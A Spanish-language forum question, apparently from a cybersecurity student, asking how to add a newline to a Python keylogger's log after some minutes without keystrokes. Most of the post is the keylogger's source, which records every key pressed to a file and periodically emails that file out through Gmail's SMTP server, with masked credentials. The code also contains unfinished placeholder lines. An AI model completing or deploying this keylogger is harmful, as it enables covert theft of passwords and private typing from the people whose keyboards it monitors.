# ¿Alguien sabe como hacer un salto de linea cada 10min? (keylogger python)

Tags: python

Estoy estudianto cibersec y soy nuevo en python pero estoy recreando un keylogger a partir de lo que entiendo y lo que voy aprendiendo, mi duda es como hacer que haga un salto de linea cada 20 min cuando no se capten registros en el teclado, estoy bastante atascado con una variable que no se como enfocarla del todo.

Pienso que lo ideal seria saber cuando fue la ultima pulsación y restarla con el tiempo actual y si es mayor que X que haga un salto con (\n) pero no se aplicarlo del todo, me falta saber como hacer la variable que capte la ultima pulsación pero no acabo de verlo claro. Te pongo lo que tengo hecho a ver si me puedes echar una mano.

def key_listener():

```
d = datetime.datetime.now().strftime('%y-%m-%d_%H-%M-%S')
file_name = 'keylogg_{}.txt'.format(d)
f = open(file_name, 'w')
time0 = time.time()


timeout = datetime.datetime.now() + int(time0) ??????

def send_email():

    with open(file_name, 'r+') as f:
      
        msg = MIMEMultipart()
        msg['Subject'] = 'keylogger'
        body = 'hello world'

        msg.attach(MIMEText(body, 'plain'))
        attachment = open((file_name), 'r')

        part = MIMEBase('application', 'octect-stream')
        part.set_payload((attachment).read())
        encoders.encode_base64(part)
        part.add_header('Content-Disposition', "attachment; filename= " + file_name)
        msg.attach(part)

        text = msg.as_string()
       
        try:

            server = smtplib.SMTP('smtp.gmail.com', 587)
            server.starttls()
            server.login('xxx@gmail.com', 'xxxx')
            server.sendmail('xxxx', 'xxxx', text)
            server.quit()
            key_listener()

        except:
            server.quit()
            key_listener()

def key_recorder(key):

        key = str(key)

        if key == 'Key.ctrl':
            f.write('')
        elif key == 'Key.enter':
            f.write('\n')
        elif key == 'Key.space':
            f.write(' ')
        elif key == 'Key.backspace':
            f.write('%BORRAR%')
        elif key == 'Key.esc':
            f.write("[Esc]")
        elif key == 'Key.shift_r':
            f.write('')
        elif key == 'Key.caps_lock':
            f.write('[MAYUSCULAS]')
        else:
            f.write(key.replace("'", ""))

        if timeout > 10:???????
            f.write('\n')

        # Es cada 7200 (2h)
        if time.time() - time0 > 20:
            f.close()
            send_email()

with Listener(on_press=key_recorder) as listener:
    listener.join()
```

## STARTS CICLE

while True:
key_listener()